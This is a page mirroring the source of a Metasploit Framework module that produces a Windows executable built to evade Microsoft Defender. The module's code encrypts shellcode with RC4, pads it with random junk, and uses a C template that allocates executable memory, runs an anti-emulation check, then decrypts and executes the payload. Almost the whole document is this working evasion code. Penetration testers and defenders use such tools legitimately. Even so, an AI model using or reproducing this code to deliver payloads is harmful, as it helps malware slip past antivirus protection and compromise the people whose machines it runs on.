Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/evasion/windows/windows_defender_exe.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/compiler/windows'

7


8
class MetasploitModule < Msf::Evasion

9


10
  def initialize(info = {})

11
    super(

12
      merge_info(

13
        info,

14
        'Name' => 'Microsoft Windows Defender Evasive Executable',

15
        'Description' => %q{

16
          This module allows you to generate a Windows EXE that evades against Microsoft

17
          Windows Defender. Multiple techniques such as shellcode encryption, source code

18
          obfuscation, Metasm, and anti-emulation are used to achieve this.

19


20
          For best results, please try to use payloads that use a more secure channel

21
          such as HTTPS or RC4 in order to avoid the payload network traffic getting

22
          caught by antivirus better.

23
        },

24
        'Author' => [ 'sinn3r' ],

25
        'License' => MSF_LICENSE,

26
        'Platform' => 'win',

27
        'Arch' => ARCH_X86,

28
        'Targets' => [ ['Microsoft Windows', {}] ]

29
      )

30
    )

31
  end

32


33
  def rc4_key

34
    @rc4_key ||= Rex::Text.rand_text_alpha(32..64)

35
  end

36


37
  def get_payload

38
    @get_payload ||= lambda {

39
      opts = { format: 'rc4', key: rc4_key }

40
      junk = Rex::Text.rand_text(10..1024)

41
      p = payload.encoded + junk

42


43
      return {

44
        size: p.length,

45
        c_format: Msf::Simple::Buffer.transform(p, 'c', 'buf', opts)

46
      }

47
    }.call

48
  end

49


50
  def c_template

51
    @c_template ||= %|#include <Windows.h>

52
#include <rc4.h>

53


54
// The encrypted code allows us to get around static scanning

55
#{get_payload[:c_format]}

56


57
int main() {

58
  int lpBufSize = sizeof(int) * #{get_payload[:size]};

59
  LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, MEM_COMMIT, 0x00000040);

60
  memset(lpBuf, '\\0', lpBufSize);

61


62
  HANDLE proc = OpenProcess(0x1F0FFF, false, 4);

63
  // Checking NULL allows us to get around Real-time protection

64
  if (proc == NULL) {

65
    RC4("#{rc4_key}", buf, (char*) lpBuf, #{get_payload[:size]});

66
    void (*func)();

67
    func = (void (*)()) lpBuf;

68
    (void)(*func)();

69
  }

70


71
  return 0;

72
}|

73
  end

74


75
  def run

76
    vprint_line c_template

77
    # The randomized code allows us to generate a unique EXE

78
    bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)

79
    print_status("Compiled executable size: #{bin.length}")

80
    file_create(bin)

81
  end

82


83
end

84


85